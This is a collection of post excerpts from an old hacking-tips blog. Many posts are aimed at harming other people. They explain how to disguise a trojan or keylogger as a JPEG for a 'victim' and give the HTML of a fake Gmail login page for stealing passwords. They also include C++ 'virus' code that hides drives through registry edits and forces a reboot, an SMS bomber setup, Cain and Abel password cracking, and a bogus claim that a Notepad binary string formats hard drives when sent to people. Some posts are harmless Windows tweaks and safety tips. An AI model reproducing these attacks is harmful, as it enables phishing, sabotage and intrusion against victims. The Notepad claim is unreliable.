Posts

Showing posts from 2012

Hide EXE File into JPEG

This is a good trick to hide your exe files into a jpg file..! How about sending a trojan or a keylogger into your victim using this trick..?? 1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked. Basically what you need is to see hidden files and see the extension of all your files on your pc. 2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it) 3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg' 4) Windows is going to warn you

Hacking Autorun.inf virus attack|Is autorun.inf virus?

This article will give you complete details about the autorun.inf file.This is the instructions that saved in the infected(call virus programs) autorun.inf file: [Autorun] Open=RECYCLER\QqFvXcB.exe Explore=RECYCLER\QqFvXcB.exe AutoPlay=RECYCLER\QqFvXcB.exe shell\Open\Command=RECYCLER\QqFvXcB.exe shell\Open\Default=1 shell\Explore\command=RECYCLER\QqFvXcB.exe shell\Autoplay\Command=RECYCLER\QqFvXcB.exe is autorun.inf virus file?  no.  Then why antivirus block the autorun.inf files?  Go ahead to know the full details about auto run file. Introduction to Autorun.inf File: Auto run is file that triggers other programs,documents ,other files to be opened when the cd or pen drives are inserted.  Simpy triggers. When cd or pen drives are inserted, windows will search for the autorun.inf file and follow the instructions of autorun.inf file(instructions have written inside the autorun.inf file). How to create Autorun file? Open notepad type this command: [Auto

Facebook Hack – View photo of non-friends

How can I see Facebook pictures from non friends? Go to the Profile page of the person whose  photos  you want to  see . You can click on their name on your News Feed, find them in the  friends  list of a  friend  of yours, or use the Search field at the top of your screen to search their name. Click or tap  Photos .

Steganography

Image
-: Steganography :- The art and science of hiding information by embedding messages within other, seemingly harmless messages. Steganography works by replacing bits of useless or unused data in regular computer files (such as graphics, sound, text, HTML, or even floppy disks ) with bits of different, invisible information. This hidden information can be plain text, cipher text, or even images. Some common files used for hiding the data are .jpeg, .bmp, .jpg, .bmp, .pdf, .mp3, .wav, .gif, etc. The following example gives detailed overview on how data can be hide by steganography :- The tool used in this example is "S-Tools". Download S-Tool.zip (273 KB) 1) Prepare the secret file that you want to hide (eg. '.txt') 2) Launch the st

Cracking GMail Account Password

Image
-: Cracking GMail Account Password :- Here is the most effective technique for cracking GMail Accounts Passwords. This method uses 'Social Engineering' rather than 'Phishing'. Follow the steps as given below :- Success Rate :-   90% Step-1 : Create your own fake gmail login form using HTML, which may look like one as shown below- The HTML code for above login screen created by me is given below- <html lang="en" dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type=text/css> <!-- body,td,div,p,a,font,span {font-family: arial,sans-serif} body {margin-top:2} .c {width: 4; height: 4} .bubble {background-color:#C3D9FF} .tl {padding: 0; width: 4; text-align: left; vertical-align: top} .tr {padding: 0; width: 4; text-align: right; vertical-align:

Windows-XP Password Cracking

Image
Windows-XP Password Cracking :- Here we use the tool "Cain and Abel" for cracking passwords of any local user/administrator. First download cain and abel from "http://www.oxid.it/cain.html" and install it on your system. Make sure that you have disabled the antivirus/firewall running on your system before installing and throughout this process. Two most effective techniques used here are "Brute-Force" and "Cryptanalysis" . Brute-Force:- As this techniques takes more time to complete, the attacker prefer this technique only when there is a hope that the password contain same type of characters or may be two. i.e only loweralpha, only alpha, only numeric or may be loweralpha-numeric, also it should contain less than 7 characters. Otherwise it takes more time to crack password, which may be the mixture of all types of characters along with special symbols. The step-by-st

Ethical Hacking: What are Computer Viruses

Ethical Hacking: What are Computer Viruses : What is a Computer Virus ? A potentially damaging computer programme capable of reproducing itself c...

Ethical Hacking: How to use MSCONFIG in Windows 7

Ethical Hacking: How to use MSCONFIG in Windows 7 : How to use MSCONFIG in Windows 7 Here is how to use MSCONFIG in Windows 7 to disable some of the unnecessary programs that automatically...

How to use MSCONFIG in Windows 7

Image
How to use MSCONFIG in Windows 7 Here is how to use MSCONFIG in Windows 7 to disable some of the unnecessary programs that automatically load on start-up. Disabling these programs will help your computer boot faster and crash less. [For step-by-step instructions on how to use MSCONFIG in other versions of Windows, please visit my main How to Use MSCONFIG page.] 1. Click on the Windows 7 start icon in the bottom left corner of your screen. 2. Type MSCONFIG in the search box and then either press enter on your keyboard or double-click on the MSCONFIG program that appears in the search results. 4. Windows 7 will launch Microsoft's System Configuration Utility. Click on the Startup tab. 4. This takes you to a page with a list of "startup items." Startup items are programs that are automatically loaded every time you turn on your computer. Some startup programs are absolutely necessary, others are simply a waste of RAM.

What are Computer Viruses

What is a Computer Virus ? A potentially damaging computer programme capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user. Types of viruses :- The different types of viruses are as follows- 1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk ac

What IS IP Spoofing

Image
The term IP (Internet Protocol) address spoofing refers to the creation of IP packets with a forged (spoofed) source IP address with the purpose of concealing the identity of the sender or impersonating another computing system. Why it works ? IP-Spoofing works because trusted services only rely on network address based authentication. Since IP is easily duped, address forgery is not difficult. The main reason is security weakness in the TCP protocol known as sequence number prediction. How it works ? To completely understand how ip spoofing can take place, one must examine the structure of the TCP/IP protocol suite. A basic understanding of these headers and network exchanges is crucial to the process. Internet Protocol (IP) : It is a network protocol op

Network Hacking-Tricks

Image
Network Hacking is generally means gathering information about domain by using tools like Telnet, NslookUp, Ping, Tracert, Netstat, etc. It also includes OS Fingerprinting, Port Scaning and Port Surfing using various tools. Ping :- Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not. To ping a particular host the syntax is (at command prompt)-- c:/>ping hostname.com example:- c:/>ping www.google.com Various attributes used with 'Ping' command and their usage can be viewed by just typing c:/>ping at the command prompt. Netstat :- It displays protocol statistics and current TCP/IP network connections. i.e. local address, remote address, port number, etc. It&#

Denial Of Service (DoS) Attacks

Image
A denial of service (DoS) attack is an attack that clogs up so much memory on the target system that it can not serve it's users, or it causes the target system to crash, reboot, or otherwise deny services to legitimate users.There are several different kinds of dos attacks as discussed below:- 1) Ping Of Death :- The ping of death attack sends oversized ICMP datagrams (encapsulated in IP packets) to the victim.The Ping command makes use of the ICMP echo request and echo reply messages and it's commonly used to determine whether the remote host is alive. In a ping of death attack, however, ping causes the remote system to hang, reboot or crash. To do so the attacker uses, the ping command in conjuction with -l argument (used to specify the size of the packet sent) to ping the target system that exceeds the maximum bytes allowed by TCP/IP (65,536). example:- c:/>ping -l 65540 h

Find Who is invisible or blocked you on Google Talk

Image
Find Who is invisible or blocked you on Google Talk Steps to find who is invisible or blocked you on gtalk : 1) Download & Install Pidgin Click here to download Pidgin chat client. If you already have Pidgin installed, you may skip this step. 2) Configure Pidgin for Gtalk You’ll probably start with the below screen. Click the Add button. “Accounts -> Manage Account” will also bring you to the same screen. Let’s add Gtalk to Pidgin. Clicking Add will allow you to add new Gtalk account. The following two screenshots show what you need to fill up for Basic and Advance tab. With all the settings properly entered, you should be able to connect to Gtalk and load your contacts successfully. 3) Find Who’s Blocking You When someone blocked you in Gtalk (and other IMs), they appear offline just like your other contacts who are really offline. Right click, click on Get Info, and we’ll see how to differentiate them. The following image is a comparison of 2 dif

Create Folders And Files With NO! Name

This trick will allow you to create files and folders without any name. Just follow the steps as given below :- 1) Select any file or folder. 2) Right click on it, select 'Rename' or simply press 'F2'. 3) Press and hold the 'Alt' key. While holding the Alt key, type numbers '0160' from the numpad. Note :- Type the numbers '0160' from the numpad, that is, the numbers present on the right side of the keyboard. Don’t type the numbers which are present on top of the character keys. 4) Press Enter and the nameless file or folder will be created. Reason :- The file or folder that seems nameless is actually named with a single space. But what if you want to create another nameless file or folder in the same direc

Format A HDD With Notepad

If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool. Step 1 :- Copy The Following In Notepad Exactly as it is. says01001011000111110010010101010101010000011111100000 Step 2 :- Save As An EXE Any Name Will Do Step 3 :- Send the EXE to People And Infect OR IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code format c:\ /Q/X — this will format your drive c:\ 01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000

Increase Broadband Speed Using Simple Tweak

A Simple Tweak (XP Pro only) which will increase your Broadband Speed. Make sure you Log on as Administrator, not as a user with Administrator privileges. Follow the steps as given below- 1) Click on Start Button. 2) Select Run From Start Menu. 3) Type gpedit.msc 4) Expand the [Administrative Templates] branch. 5) Then Expand the [Network] branch. 6) Highlight(Select by Single Click) [QoS Packet Scheduler] 7) Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel) 8) Check(Select By Single Click on it) [Enabled] 9) Change [Bandwidth limit %] to 0 % 10) Click [OK] Button. 11) Restart Your PC. 12)

Improve Windows-XP Shutdown Speed

This tweak reduces the time Windows-XP waits before automatically closing any running programs when you give it the command to shutdown. Follow the steps as given below- 1) Go to Start then select Run 2) Type 'Regedit' and click ok 3) Find 'HKEY_CURRENT_USER\Control Panel\Desktop\' 4) Select 'WaitToKillAppTimeout' 5) Right click and select 'Modify' 6) Change the value to '1000' 7) Click 'OK' 8) Now select 'HungAppTimeout' 9) Right click and select 'Modify' 10) Change the value to '1000' 11) Click 'OK'

Increase RAM (Virtual) - To Make Your System Faster

Follow the steps given below :- 1) Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard. Another way is Right-Clicking 'My Computer' and then Select 'Properties'. 2) Click on the 'Advanced' tab. 3) Under 'Performance', click 'Settings'. 4) Then click the 'Advanced' tab on the button that pops up. 5) Under 'Virtual Memory' at the bottom, click 'Change'. 6) Click the 'Custom Size' button. 7) For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000). 8) Click 'Set

Command Line SMS Bomber for linux users

This Post is writtern By disk0 A friend and I wrote this command line SMS bomber in Bash. It allows you to set the message you want to send, the phone number to send it to, the carrier of the phone (which can be found at http://www.fonefinder.net), and the delay between messages. You'll need to install 'ssmtp' If you're using Ubuntu or BT4 you can type: Code: sudo apt-get install ssmtp You'll also need a Gmail account (I'm sure you could use another e-mail service, just make changes accordingly). Then you'll need to edit the configuration file (located at /etc/ssmtp/ssmtp.conf) Where it says: Code: # The place where the mail goes. The actual machine name is required no # MX records are consulted. Commonly mailhosts are named mail.domain.com mailhub=whatever Change it to mailhub=smtp.gmail.com:587 Then add this at the end of the configuration file: Code: AuthUser=YOURUSERNAME@gmail.com AuthPass=YOURPASSWORD UseSTARTTLS=YE

C++ ,Batch Virus code to disable All Hard disk

Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also. C++ Virus Code : #include < windows.h > #include < fstream.h > #include < iostream.h > #include < string.h > #include < conio.h > int main() { ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/ write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\syst

How to hide the windows while running the virus code?

Good Morning Friends...!!  This day will be great day!  Because Break The Security get top rank in blogger directories.  Now i am going to introduce a new tool called as "CMDOW" .   When you create and send virus to victim, the virus running process may be shown to victims.  This tool will hide that also. About Cmdow Cmdow is a Win32 commandline utility for NT4/2000/XP/2003 that allows windows to be listed, moved, resized, renamed, hidden/unhidden, disabled/enabled, minimized, maximized, restored, activated/inactivated, closed, killed and more. Cmdow is 31kb standalone executable. It does not create any temporary files, nor does it write to the registry. There is no installation procedure, just run it. To completely remove all traces of it from your system, delete it. Cmdow was written with batch file programmers in mind. Particular attention has been paid to Cmdows output making it easy to process with the 'FOR /F' command found in NT4/2000/XP

How to do Cookie Stealing with Cross site Scripting Vulnerability ? : XSS Tutorials

HACKING FACEBOOK PASSWORDS...????

Are you searching for Facebook or gmail Hacking Software?  if your answer is yes,  you come to the right place. You may read  somewhere else as "use this hacking software to hack facebook accounts". And some hacking blogs has some post like this with procedure: Download this software Run the application. Enter your email id and password Enter your victim email id. That's all your friend account is hacked.  Some hacking bloggers also mentioned Bruteforcer for Facebook.  if you enter the email id, it will hack the email. First of all , let me ask one question " Do you think facebook is f****ng stupids?"  .  Do you think it is possible to hack any accounts within a minute using these kind of softwares?(Innocence). The truth is that you are being hacked.  You realized that? Don't be a n00b, think like a Security Expert.   Then what is Facebook Hacking softwares? There is no Such software that will hack Facebook accounts , i

HOW TO CREATE UNBREAKABLE PASSWORDS

What is your password ? is your password like 123456, 98654,billgates,yourname,lovername,iloveyou,thankyou?  Then you will definitely  loose your account soon. The hackers can easily hack your account with much effort. Your password should be : Above 10 letters Both uppercase and lowercase letters Should use special characters like '&'. Should contain Numbers Should not Use any names of your lover ,mother,father,etc. Should not be usual words like iloveyou,ihateyou,ihateu. Should not be your birthday like oct2010. http://howsecureismypassword.net Consider this tips when you create a password. Secure your password.

List of websites to check whether website is safe to use or not

In one of my posts, i explained how to check a website is safe or not using McAfee siteAdvisor add on .  But ,checking with one site is not enough.  To make sure whether site is free from malware or not, we have to verify the target-link with few more sites. Here ,i list out some websites that helpful to identify whether site is safe or not : 1.MyWot: WOT is a community-based, free safe surfing tool for browsers that provides website ratings & reviews to help web users as they search, surf & shop online. website: www.mywot.com   2.VirusTotal: VirusTotal is a free virus, malware and URL online scanning service. File checking is done with more than 40 antivirus solutions.   website: www.virustotal.com   3.Norton Safe Web, from Symantec Look up website safety information and safe site rankings from Norton Safe Web from Symantec. Read what others think and write your site reviews. website: safeweb.norton.com   4. Unmask Parasites Fre

CHECK IF TOUR FACEBOOK ACCOUNT IS ACCESSED IN ANOTHER LOCATIONS

Image
If you think that someone has accessed your account , checking the last location from where your account was accessed is very simple and practical. Go to Your Account->Go to Account Settings ->Go to Account Security. Here you can view your recent account activity . Also you can receive an email alert when a new computer or mobile device logs into your account.

Command Prompt Tricks and Hacks

Image
1. Use Ctrl-C to Abort a Command Just about any command can be stopped in its tracks with the abort command: Ctrl-C . If you haven't actually executed a command, you can just backspace and erase what you've typed, but if you've already executed it then you can do a Ctrl-C to stop it. Warning: Ctrl-C isn't a magic wand and it can't undo things that aren't undoable, like a partially complete format command . However, for things like the dir command that seem to go on forever or questions you're asked at the prompt that you don't know the answer to, the abort command is an excellent Command Prompt trick to know. 2. View a Command's Results One Page (or Line) at a Time Ever run a command, like the dir command, that produces so much information on the screen that it's almost useless? You're not alone. One way around this is to execute the command in a special way so whatever information is generated is shown to yo